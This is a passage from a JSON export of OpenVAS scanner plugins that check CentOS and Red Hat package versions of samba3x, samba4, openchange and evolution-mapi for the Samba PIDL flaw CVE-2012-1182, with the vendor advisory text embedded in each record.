unauthenticated attacker could send a specially-crafted\n RPC request that would cause the Samba daemon (smbd) to crash or, possibly,\n execute arbitrary code with the privileges of the root user.\n (CVE-2012-1182)\n \n Users of Samba are advised to upgrade to these updated packages, which\n contain a backported patch to resolve this issue. After installing this\n update, the smb service will be restarted automatically.\";\n\ntag_affected = \"samba3x on CentOS 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-April/018561.html\");\n script_id(881228);\n script_version(\"$Revision: 8352 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-10 08:01:57 +0100 (Wed, 10 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:53:03 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2012:0466\");\n script_name(\"CentOS Update for samba3x CESA-2012:0466 centos5 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of samba3x\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba3x\", rpm:\"samba3x~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-client\", rpm:\"samba3x-client~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-common\", rpm:\"samba3x-common~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-doc\", rpm:\"samba3x-doc~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-domainjoin-gui\", rpm:\"samba3x-domainjoin-gui~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-swat\", rpm:\"samba3x-swat~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-winbind\", rpm:\"samba3x-winbind~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-winbind-devel\", rpm:\"samba3x-winbind-devel~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:16", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-02-22T00:00:00", "type": "openvas", "title": "RedHat Update for samba4 RHSA-2013:0506-02", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310870935", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870935", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for samba4 RHSA-2013:0506-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2013-February/msg00049.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870935\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-22 10:02:23 +0530 (Fri, 22 Feb 2013)\");\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"RHSA\", value:\"2013:0506-02\");\n script_name(\"RedHat Update for samba4 RHSA-2013:0506-02\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba4'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n script_tag(name:\"affected\", value:\"samba4 on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\n compiler, used to generate code to handle RPC calls. This could result in\n code generated by the PIDL compiler to not sufficiently protect against\n buffer overflows. (CVE-2012-1182)\n\n The samba4 packages have been upgraded to upstream version 4.0.0, which\n provides a number of bug fixes and enhancements over the previous version.\n In particular, improved interoperability with Active Directory (AD)\n domains. SSSD now uses the libndr-krb5pac library to parse the Privilege\n Attribute Certificate (PAC) issued by an AD Key Distribution Center (KDC).\n\n The Cross Realm Kerberos Trust functionality provided by Identity\n Management, which relies on the capabilities of the samba4 client library,\n is included as a Technology Preview. This functionality and server\n libraries, is included as a Technology Preview. This functionality uses the\n libndr-nbt library to prepare Connection-less Lightweight Directory Access\n Protocol (CLDAP) messages.\n\n Additionally, various improvements have been made to the Local Security\n Authority (LSA) and Net Logon services to allow verification of trust\n from a Windows system. Because the Cross Realm Kerberos Trust functionality\n is considered a Technology Preview, selected samba4 components are\n considered to be a Technology Preview. For more information on which Samba\n packages are considered a Technology Preview, refer to Table 5.1, Samba4\n Package Support in the Release Notes, linked to from the References.\n (BZ#766333, BZ#882188)\n\n This update also fixes the following bug:\n\n * Prior to this update, if the Active Directory (AD) server was rebooted,\n Winbind sometimes failed to reconnect when requested by wbinfo -n or\n wbinfo -s commands. Consequently, looking up users using the wbinfo tool\n failed. This update applies upstream patches to fix this problem and now\n looking up a Security Identifier (SID) for a username, or a username for a\n given SID, works as expected after a domain controller is rebooted.\n (BZ#878564)\n\n All users of samba4 are advised to upgrade to these updated packages,\n which fix these issues and add these enhancements.\n\n Warning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\n Enterprise Linux 6.4 and you have Samba in use, you should make sure that\n you uninstall the package named samba4 to avoid conflicts during the\n upgrade.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba4\", rpm:\"samba4~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-client\", rpm:\"samba4-client~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-common\", rpm:\"samba4-common~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-dc\", rpm:\"samba4-dc~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-dc-libs\", rpm:\"samba4-dc-libs~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-debuginfo\", rpm:\"samba4-debuginfo~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-devel\", rpm:\"samba4-devel~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-libs\", rpm:\"samba4-libs~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-pidl\", rpm:\"samba4-pidl~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-python\", rpm:\"samba4-python~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-swat\", rpm:\"samba4-swat~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-test\", rpm:\"samba4-test~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind\", rpm:\"samba4-winbind~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind-clients\", rpm:\"samba4-winbind-clients~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind-krb5-locator\", rpm:\"samba4-winbind-krb5-locator~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:08", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-03-12T00:00:00", "type": "openvas", "title": "CentOS Update for openchange CESA-2013:0515 centos6", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881680", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881680", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for openchange CESA-2013:0515 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-March/019453.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881680\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-12 10:02:45 +0530 (Tue, 12 Mar 2013)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2013:0515\");\n script_name(\"CentOS Update for openchange CESA-2013:0515 centos6\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openchange'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"openchange on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The openchange packages provide libraries to access Microsoft Exchange\n servers using native protocols. Evolution-MAPI uses these libraries to\n integrate the Evolution PIM application with Microsoft Exchange servers.\n\n A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\n compiler. As OpenChange uses code generated by PIDL, this could have\n resulted in buffer overflows in the way OpenChange handles RPC calls. With\n this update, the code has been generated with an updated version of PIDL to\n correct this issue. (CVE-2012-1182)\n\n The openchange packages have been upgraded to upstream version 1.0, which\n provides a number of bug fixes and enhancements over the previous version,\n including support for the rebased samba4 packages and several API changes.\n (BZ#767672, BZ#767678)\n\n This update also fixes the following bugs:\n\n * When the user tried to modify a meeting with one required attendee and\n himself as the organizer, a segmentation fault occurred in the memcpy()\n function. Consequently, the evolution-data-server application terminated\n unexpectedly with a segmentation fault. This bug has been fixed and\n evolution-data-server no longer crashes in the described scenario.\n (BZ#680061)\n\n * Prior to this update, OpenChange 1.0 was unable to send messages with\n a large message body or with extensive attachment. This was caused by minor\n issues in OpenChange's exchange.idl definitions. This bug has been fixed\n and OpenChange now sends extensive messages without complications.\n (BZ#870405)\n\n All users of openchange are advised to upgrade to these updated packages,\n which fix these issues and add these enhancements.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"openchange\", rpm:\"openchange~1.0~4.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openchange-client\", rpm:\"openchange-client~1.0~4.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openchange-devel\", rpm:\"openchange-devel~1.0~4.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openchange-devel-docs\", rpm:\"openchange-devel-docs~1.0~4.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:51:53", "description": "Check for the Version of samba4", "cvss3": {}, "published": "2013-03-12T00:00:00", "type": "openvas", "title": "CentOS Update for samba4 CESA-2013:0506 centos6 ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:881650", "href": "http://plugins.openvas.org/nasl.php?oid=881650", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for samba4 CESA-2013:0506 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\n compiler, used to generate code to handle RPC calls. This could result in\n code generated by the PIDL compiler to not sufficiently protect against\n buffer overflows. (CVE-2012-1182)\n \n The samba4 packages have been upgraded to upstream version 4.0.0, which\n provides a number of bug fixes and enhancements over the previous version.\n In particular, improved interoperability with Active Directory (AD)\n domains. SSSD now uses the libndr-krb5pac library to parse the Privilege\n Attribute Certificate (PAC) issued by an AD Key Distribution Center (KDC).\n \n The Cross Realm Kerberos Trust functionality provided by Identity\n Management, which relies on the capabilities of the samba4 client library,\n is included as a Technology Preview. This functionality and server\n libraries, is included as a Technology Preview. This functionality uses the\n libndr-nbt library to prepare Connection-less Lightweight Directory Access\n Protocol (CLDAP) messages.\n \n Additionally, various improvements have been made to the Local Security\n Authority (LSA) and Net Logon services to allow verification of trust\n from a Windows system. Because the Cross Realm Kerberos Trust functionality\n is considered a Technology Preview, selected samba4 components are\n considered to be a Technology Preview. For more information on which Samba\n packages are considered a Technology Preview, refer to Table 5.1, "Samba4\n Package Support" in the Release Notes, linked to from the References.\n (BZ#766333, BZ#882188)\n \n This update also fixes the following bug:\n \n * Prior to this update, if the Active Directory (AD) server was rebooted,\n Winbind sometimes failed to reconnect when requested by "wbinfo -n" or\n "wbinfo -s" commands. Consequently, looking up users using the wbinfo tool\n failed. This update applies upstream patches to fix this problem and now\n looking up a Security Identifier (SID) for a username, or a username for a\n given SID, works as expected after a domain controller is rebooted.\n (BZ#878564)\n \n All users of samba4 are advised to upgrade to these updated packages,\n which fix these issues and add these enhancements.\n \n Warning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\n Enterprise Linux 6.4 and you have Samba in use, you should make sure that\n you uninstall the package named "samba4" to avoid conflicts during the\n upgrade.\";\n\n\ntag_affected = \"samba4 on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2013-March/019498.html\");\n script_id(881650);\n script_version(\"$Revision: 6655 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:48:58 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-12 10:00:01 +0530 (Tue, 12 Mar 2013)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2013:0506\");\n script_name(\"CentOS Update for samba4 CESA-2013:0506 centos6 \");\n\n script_summary(\"Check for the Version of samba4\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba4\", rpm:\"samba4~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-client\", rpm:\"samba4-client~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-common\", rpm:\"samba4-common~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-dc\", rpm:\"samba4-dc~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-dc-libs\", rpm:\"samba4-dc-libs~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-devel\", rpm:\"samba4-devel~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-libs\", rpm:\"samba4-libs~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-pidl\", rpm:\"samba4-pidl~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-python\", rpm:\"samba4-python~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-swat\", rpm:\"samba4-swat~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-test\", rpm:\"samba4-test~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind\", rpm:\"samba4-winbind~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind-clients\", rpm:\"samba4-winbind-clients~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind-krb5-locator\", rpm:\"samba4-winbind-krb5-locator~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-18T11:09:26", "description": "Check for the Version of evolution-mapi", "cvss3": {}, "published": "2013-03-12T00:00:00", "type": "openvas", "title": "CentOS Update for evolution-mapi CESA-2013:0515 centos6 ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-01-17T00:00:00", "id": "OPENVAS:881654", "href": "http://plugins.openvas.org/nasl.php?oid=881654", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for evolution-mapi CESA-2013:0515 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The openchange packages provide libraries to access Microsoft Exchange\n servers using native protocols. Evolution-MAPI uses these libraries to\n integrate the Evolution PIM application with Microsoft Exchange servers.\n\n A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\n compiler. As OpenChange uses code generated by PIDL, this could have\n resulted in buffer overflows in the way OpenChange handles RPC calls. With\n this update, the code has been generated with an updated version of PIDL to\n correct this issue. (CVE-2012-1182)\n \n The openchange packages have been upgraded to upstream version 1.0, which\n provides a number of bug fixes and enhancements over the previous version,\n including support for the rebased samba4 packages and several API changes.\n (BZ#767672, BZ#767678)\n \n This update also fixes the following bugs:\n \n * When the user tried to modify a meeting with one required attendee and\n himself as the organizer, a segmentation fault occurred in the memcpy()\n function. Consequently, the evolution-data-server application terminated\n unexpectedly with a segmentation fault. This bug has been fixed and\n evolution-data-server no longer crashes in the described scenario.\n (BZ#680061)\n \n * Prior to this update, OpenChange 1.0 was unable to send messages with\n a large message body or with extensive attachment. This was caused by minor\n issues in OpenChange's exchange.idl definitions. This bug has been fixed\n and OpenChange now sends extensive messages without complications.\n (BZ#870405)\n \n All users of openchange are advised to upgrade to these updated packages,\n which fix these issues and add these enhancements.\";\n\n\ntag_affected = \"evolution-mapi on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2013-March/019320.html\");\n script_id(881654);\n script_version(\"$Revision: 8448 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 17:18:06 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-12 10:00:29 +0530 (Tue, 12 Mar 2013)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2013:0515\");\n script_name(\"CentOS Update for evolution-mapi CESA-2013:0515 centos6 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of evolution-mapi\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"evolution-mapi\", rpm:\"evolution-mapi~0.28.3~12.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"evolution-mapi-devel\", rpm:\"evolution-mapi-devel~0.28.3~12.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-11T11:06:20", "description": "Check for the Version of update", "cvss3": {}, 